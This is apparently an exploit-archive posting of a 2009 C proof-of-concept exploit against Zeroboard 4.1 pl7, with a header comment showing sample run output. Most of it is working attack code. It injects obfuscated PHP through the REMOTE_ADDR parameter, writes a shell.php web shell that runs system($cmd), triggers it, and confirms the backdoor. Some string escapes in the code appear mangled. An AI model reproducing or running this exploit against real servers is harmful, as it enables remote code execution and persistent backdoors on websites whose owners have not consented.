zeroboard41-exec.txt

Posted on 04 September 2009
/*
poc by  kyoungchip,jang
email : SpeeDr00t1004@gmail.com

[*] the bug
- http://www.xpressengine.com/15955761

Application
- Zeroboard 4.1 pl7

Reference:
- http://www.nzeo.com
- Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada


[*] Target - My test server

$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target :  http://xxx.xxx.xxx/zboard/bbs/shell.php?cmd=ls



[+] xxx.xxx.xxx connecting ok!
[+] Exploiting zeroboard start  - [+] Exploiting success!!
[*] Create Backdoor Start - [+] Create Backdoor  success!!
[*] Confirmming your backdoor php script - http://192.168.179.6/zeroboard/zb41pl7/bbs/data/shell.php is generated!
[+] Exploiting success!!
- http://192.168.179.6/zeroboard/bbs/data/shell.php?cmd=ls [+] Execute the websehll script

*/


#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/select.h>
#include <errno.h>


#define BUFSIZE 4096
#define READSIZE 1500
#define EXPLOIT_CODE "*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1"


void ParseZbHost(char *);
void ConnectZboard(char *, unsigned short);
void ExploitZboard(void);
void ConfirmPHPScript(void);
void CreateBackdoor(void);
void StatusProcess(void);
void Usage(char *);
void OutputErr(char *, int);

char *zb_host;
char *zb_dir;
char *zb_tid;
unsigned short zb_port;

int sockfd = -1;
int reconn=0;
char ReadBuf[READSIZE];
char WriteBuf[BUFSIZE];
char TempBuf[BUFSIZ];
char no[16];



int
main(int argc, char *argv[])
{

char *szArgv;
switch( argc )
{
case 1 :
Usage(argv[0]);
break;
case 2 :
zb_port = 80;
//szArgv = "http://192.168.179.6/zeroboard/zb41pl7/bbs/zboard.php?id=test";
ParseZbHost( szArgv );
break;

case 3:
zb_port = atoi(argv[2]);
ParseZbHost(argv[1]);

break;
default:

break;
};

ConnectZboard(zb_host, zb_port);
ExploitZboard();
CreateBackdoor();
ConfirmPHPScript();
}

void
ParseZbHost( char *zbhost )
{
char *psbuf;
char *sptr=NULL;
char *eptr=NULL;

psbuf = ( char* )malloc( strlen( zbhost ) + 1 );

strcpy( psbuf, zbhost );

if( (sptr = strstr( psbuf , "http://" ) ) == NULL)
OutputErr("http://host need
", 0);


zb_host = sptr + 7;

sptr = strchr(zb_host, '/');
sptr[0] = '';
sptr++;


if((eptr = strstr(sptr, "zboard.php?id=")) == NULL)
OutputErr(""zboard.php?id="need
", 0);

zb_tid = eptr+14;

eptr--;
eptr[0] = '';

zb_dir = sptr;

char szOut[1024];
memset( szOut , 0x00 , sizeof( szOut ) );
sprintf( szOut , " - Target : http://%s/%s/zboard.php?id=%s
", zb_host, zb_dir, zb_tid);
}


void
ConnectZboard( char *server , unsigned short port )
{

struct sockaddr_in serv;
struct hostent *hostname;

if( !( hostname = gethostbyname( server ) ) )
printf(" 
hostname = %s
", hostname );

if( (sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
printf(" 
 socket error ");

memset(&serv, 0, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_port = htons(port);
serv.sin_addr.s_addr = *((unsigned long *)hostname->h_addr_list[0]);


if(connect(sockfd, (struct sockaddr *)&serv, sizeof(struct sockaddr)) < 0)
{
printf("
 not connect");
}

if(!reconn)
{
}
else if(reconn == 1)
{
}
reconn = 0;

}


void
ExploitZboard(void)
{

fd_set fds;
struct timeval tv;

if(reconn == 1) ConnectZboard(zb_host, zb_port);

memset(WriteBuf, 0, sizeof(WriteBuf));


sprintf(WriteBuf,"GET http://%s/%s/lib.php?REMOTE_ADDR=" , zb_host,zb_dir);

sprintf(WriteBuf+strlen(WriteBuf),
"%s HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, application/vnd.ms-excel,application/vnd.ms-powerpoint, application/msword, */*
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
",EXPLOIT_CODE, zb_host);


fprintf(stdout, " [+] Exploiting zeroboard start ");
fflush(stdout);

if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);

tv.tv_sec = 60;
tv.tv_usec = 0;


FD_ZERO(&fds);

for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));

FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);


if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;

if(strstr(ReadBuf+9, "200 OK
")) {
fprintf(stdout," - [+] Exploiting success!!
", zb_host, zb_dir, zb_tid);
fflush(stdout);
return;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" - zeroboard was patched.
"
" [-] Exploit failed!
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - Bad Request
"
" [-] Exploit failed!
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}


}
}

fprintf(stderr," error!
");
}


void
CreateBackdoor(void)
{

fd_set fds;
struct timeval tv;

if(reconn == 1) ConnectZboard(zb_host, zb_port);

memset(WriteBuf, 0, sizeof(WriteBuf));

sprintf(WriteBuf,
"GET http://%s/%s/data/now_connect.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, application/vnd.ms-excel,application/vnd.ms-powerpoint, application/msword, */*
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
", zb_host,zb_dir, zb_host);

fprintf(stdout, " [*] Create Backdoor Start");
fflush(stdout);

if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);

tv.tv_sec = 60;
tv.tv_usec = 0;


FD_ZERO(&fds);

for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));

FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);


if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;

if(strstr(ReadBuf+9, "200 OK
")) {
fprintf(stdout," - [+] Create Backdoor  success!!
", zb_host, zb_dir, zb_tid);
fflush(stdout);
return;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" zeroboard was patched.
"
" [-] Exploit failed!
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - Bad Request
"
" [-] Exploit failed!
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}


}
}

fprintf(stderr," error!
");
}

void
ConfirmPHPScript(void)
{

fd_set fds;
struct timeval tv;

if(reconn == 1) ConnectZboard(zb_host, zb_port);

memset(WriteBuf, 0, sizeof(WriteBuf));

sprintf(WriteBuf,
"GET http://%s/%s/data/shell.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,application/x-shockwave-flash, application/vnd.ms-excel,application/vnd.ms-powerpoint, application/msword, */*
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
", zb_host,zb_dir, zb_host);


fprintf(stdout, " [*] Confirmming your backdoor php script");
fflush(stdout);

if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);

tv.tv_sec = 60;
tv.tv_usec = 0;


FD_ZERO(&fds);

for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));

FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);


if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;

if(strstr(ReadBuf+9, "200 OK
")) {
fprintf(stdout," - http://%s/%s/data/shell.php is generated!
 [+] Exploiting success!!
", zb_host, zb_dir);
fprintf(stdout," - http://%s/%s/data/shell.php?cmd=ls [+] Execute the websehll script  
", zb_host, zb_dir);
fflush(stdout);
return;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" - zeroboard was patched.
"
" [-] Exploit failed!
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - Bad Request
"
" [-] Exploit failed!
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}


}
}

fprintf(stderr," error!
");
}



void
StatusProcess(void)
{

putchar('.');
fflush(stdout);
}


void
OutputErr(char *msg, int type)
{

if(!type)
{
fprintf(stderr,"%s", msg);
fflush(stderr);
}
else if(type==1)
{
if(!strcmp(msg, zb_host))
{
herror(msg);
}
else
{
perror(msg);
}
}

exit(1);
}

void
Usage(char *arg)
{
fprintf(stderr,"[*] Zeroboard now_connect() vulnerability Remote code execution  exploit by SpeeDr00t
");
fprintf(stderr,"--------------------------------------------------------------------------
");
fprintf(stderr,"Usage: %s <SERVER> [PORT - default : 80] 
", arg);
fprintf(stderr,"--------------------------------------------------------------------------
");

exit(1);
}
TOP
Malware :

Last 20
Exploits :

Last 20